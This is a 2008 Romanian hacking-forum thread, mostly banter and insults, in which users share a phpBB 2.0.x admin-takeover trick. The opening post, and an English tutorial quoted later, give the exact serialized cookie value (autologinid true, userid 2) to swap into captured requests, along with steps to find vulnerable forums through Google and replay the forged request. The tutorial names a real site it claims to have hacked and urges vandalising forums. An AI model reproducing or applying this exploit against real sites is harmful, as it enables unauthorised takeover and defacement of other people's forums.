Dj-Xplood Posted March 8, 2008 Report Posted March 8, 2008 Chestia asta no sa mearga cu toate forumurile.Sa zicem ca esti cu Mozilla Firefox dai la Tools,Clear Privat Data si bifezi Cokies acuma intri in forumu' care vrei sa ai admin dupaia inchizi mozilla,acuma cauti in calculator cokies (control panel,internet options,general,browsing history-settings,view objects) acuma trebe sa cauti asta: a%3A0%3A%7B%7D si trebuie modificata cu asta: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7Dacuma intri din nou pe forum si gata esti adminDaca am gresit pe undeva sami spuneti Quote
amprenta Posted March 8, 2008 Report Posted March 8, 2008 Ai gresit timpu , daca veneai acuma 1 -2 ani probabil era o chestie interesanta . Quote
Dj-Xplood Posted March 8, 2008 Author Report Posted March 8, 2008 Ai gresit timpu , daca veneai acuma 1 -2 ani probabil era o chestie interesanta .Daca sti ceva tot de genu asta posteazal sa vedem cu totii Quote
Petzy Posted March 8, 2008 Report Posted March 8, 2008 Ai gresit timpu , daca veneai acuma 1 -2 ani probabil era o chestie interesanta .tare replica ))))))))) :twisted: Quote
Dj-Xplood Posted March 8, 2008 Author Report Posted March 8, 2008 Ai gresit timpu , daca veneai acuma 1 -2 ani probabil era o chestie interesanta .tare replica ))))))))) :twisted:venisi si u repede sa comentezi ceva...arata in plm ce sti sa faci daca esti bun nu sa dai un coment de tot kkt-ul Quote
SlicK Posted March 8, 2008 Report Posted March 8, 2008 Si tu in loc sa arunci niste stringuri aiurea ar fi trebuit sa explici pe ce forumuri functioneaza, daca mai functioneaza, de ce functioneaza, cine a descoperit bugul etc...etc... Quote
devianc3 Posted March 8, 2008 Report Posted March 8, 2008 De ce n-ar comenta?..1. Chiar e veche metoda, e in halul ala de patchuita, incat nici macar nu isi mai aduce aminte multa lume de existenta ei. Mergea pe phpBB daca bine imi amintesc.2. Replica a fost tare, trebuie sa recunoastem 3. Poate mai sunt forumuri exploatate, dar, vorba lui Slick.. Documenteaza-te, si documenteaza-ne mai tare. Asta e exact ca si meteo la romani: maine poate ploua, poate e soare, temperaturile intre -40 si +40, poate-s nori, poate nu... E mult bambilici PS: De laudat intentia, dar.. research more Quote
Petzy Posted March 8, 2008 Report Posted March 8, 2008 Ai gresit timpu , daca veneai acuma 1 -2 ani probabil era o chestie interesanta .tare replica ))))))))) :twisted:venisi si u repede sa comentezi ceva...arata in plm ce sti sa faci daca esti bun nu sa dai un coment de tot kkt-ul1. am ras la replica care a dat`o 2. am zis cumva ceva de tine?3. astfel de limbaje nu sunt permise pe acest forum din cate am vazut , practic pe nici un forum , presimt ca esti un pusti de 13 ani care nu ai ce face, de ce simti nevoie sa folosesti "plm" , pari mai interesant? sfatul meu e sa iti revizuiesti limbajul si comportamentul daca vrei sa ai succes pe astfel de forum-uri , succes. Quote
alcol Posted March 8, 2008 Report Posted March 8, 2008 Merge si aici pe RST??? Despre ce-a zis devianc3 mergea pe phpbb 2.0.7(din cate imi aduc aminte),am cautat/incercat am gasit forumuri phpbb cu gramada doar ca toate erau upgradate adica erau 3.0..... si 2.0.7> nu am mai gasit niciunul....cat despre dj-xplood vezi ca daca ai copiat un tutorial (sau mai multe) nu te pune in "lumina" staff-ului sau a forumului.Incearca sa folosesti acel tutorial pt. a invata tu nu sa-l copiezi.Crede-ma ca daca il vei copia apoi vor fii membrii care nu vor intelege exact si vor pune intrebari despre el,iar tu din moment ce l-ai copiat nu vei stii sa raspunzi deci mai bine incearca si invata si asa vei avansa nu copiind de undeva -altundeva.Sper c-am fost de-ajutor Quote
Dj-Xplood Posted March 8, 2008 Author Report Posted March 8, 2008 Ba mai lasatima drk in pace am dat si yo primu meu tutorial aici pe forumu asta am aflat de chestia aia acu 3zile si am zis sami impart cunostintele cu voi dar voi faceti misto de mine al drk sa fiu care va mai ajuta datimi ban datimi warn ca numi mai pasa imi bag pl :!:Chiar sunt GAY Quote
Dj-Xplood Posted March 8, 2008 Author Report Posted March 8, 2008 Merge si aici pe RST??? Despre ce-a zis devianc3 mergea pe phpbb 2.0.7(din cate imi aduc aminte),am cautat/incercat am gasit forumuri phpbb cu gramada doar ca toate erau upgradate adica erau 3.0..... si 2.0.7> nu am mai gasit niciunul....cat despre dj-xplood vezi ca daca ai copiat un tutorial (sau mai multe) nu te pune in "lumina" staff-ului sau a forumului.Incearca sa folosesti acel tutorial pt. a invata tu nu sa-l copiezi.Crede-ma ca daca il vei copia apoi vor fii membrii care nu vor intelege exact si vor pune intrebari despre el,iar tu din moment ce l-ai copiat nu vei stii sa raspunzi deci mai bine incearca si invata si asa vei avansa nu copiind de undeva -altundeva.Sper c-am fost de-ajutor taci ma din gura ce sti u daca lam copiat sau mi la zis un prieten :?: Quote
alcol Posted March 8, 2008 Report Posted March 8, 2008 Nu conteaza de unde l-ai copiat,conteaza ca l-ai copiat + ca nu mai e valabila metoda.Foloseste si tu Search data viitoare si vezi daca s-a mai discutat subiectul sau nu.Te ia lumea la misto pt. ca nu te documentezi sa vezi daca mai e valabila metoda...Si nu imi zici tu mie sa tac din gura asa ca SHUT UP! Quote
Dj-Xplood Posted March 8, 2008 Author Report Posted March 8, 2008 Rog adminii sa-mi stearga threatul Quote
Guest Kenpachi Posted March 8, 2008 Report Posted March 8, 2008 datimi ban datimi warn ca numi mai pasa imi bag pl :!:your wish is my command ! Quote
devianc3 Posted March 8, 2008 Report Posted March 8, 2008 datimi ban datimi warn ca numi mai pasa imi bag pl :!:your wish is my command !AHwhaHwhawHawhwaHwaHawhaHwHWawhAWhAWHwaHwaHawHAwHAWhwaHawhwaHwaHWAhAWHWAhawhWAHwa. I rest my case Quote
neox Posted March 8, 2008 Report Posted March 8, 2008 ceia ce vrei sa spui tu ii merge cu anumite exploituri cu care manipulezi cookies uitate la tutorialul care lam pus cu exploituri ii mai usor de manipulat acolo merge cu mozila si cu opera Quote
phreak Posted March 8, 2008 Report Posted March 8, 2008 banuiesc ca asta-i articolul original. noxx-DLs.info This tutorial was made for education use ONLY I will show you the most easy way to hack the old phpBBs versions 2.0.10 and lower. First off you need to things:FireFox: [url]www.GetFireFox.com[/url]Live HTTP Headers: [url]http://livehttpheaders.mozdev.org/installation.html[/url]%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Step 1:Find a forum older than 2.0.13Go to a Search like google.com or msn.comType in "Powered by phpBB 2.0.10"Like so: [url]http://www.google.ca/search?hl=en&q=powered+by+phpbb+2.0.10&btnG=Google+Search&meta=[/url]Now i found: (at the moment i have already "hacked" this one.)[url]http://www.simcraft.com/phpBB2[/url]%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Step 2:Open the site you are going to hack in a new window. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Step 3:Open "Live HTTP Headers" in Tools%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Step 4:Refresh the page (the site you are going to hack)%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Step 5:Now if you go to "Live HTTP Headers" you will see some text.Scroll to the top you will see:------------------------------Host: simcraft.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: [url]http://simcraft.com/phpBB2/index.php[/url]Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230------------------------------%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Step 6:Select the line: Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Step 7:Replace "a%3A0%3A%7B%7D" by "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"also remove "; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230"and click "Replay..."It sould look like this:------------------------------Host: simcraft.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: [url]http://simcraft.com/phpBB2/index.php[/url]Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D------------------------------%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Step 8:Click "Replay"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Step 9:Now you will see "Go to Administration Panel" at the buttom of the page.Now, sit down and fuck up the forum.asta parca l-am luat de pe rst acuma 2 ani... Quote
Camping Posted January 3, 2009 Report Posted January 3, 2009 cred ca o sa primesti un BANel nicolita Quote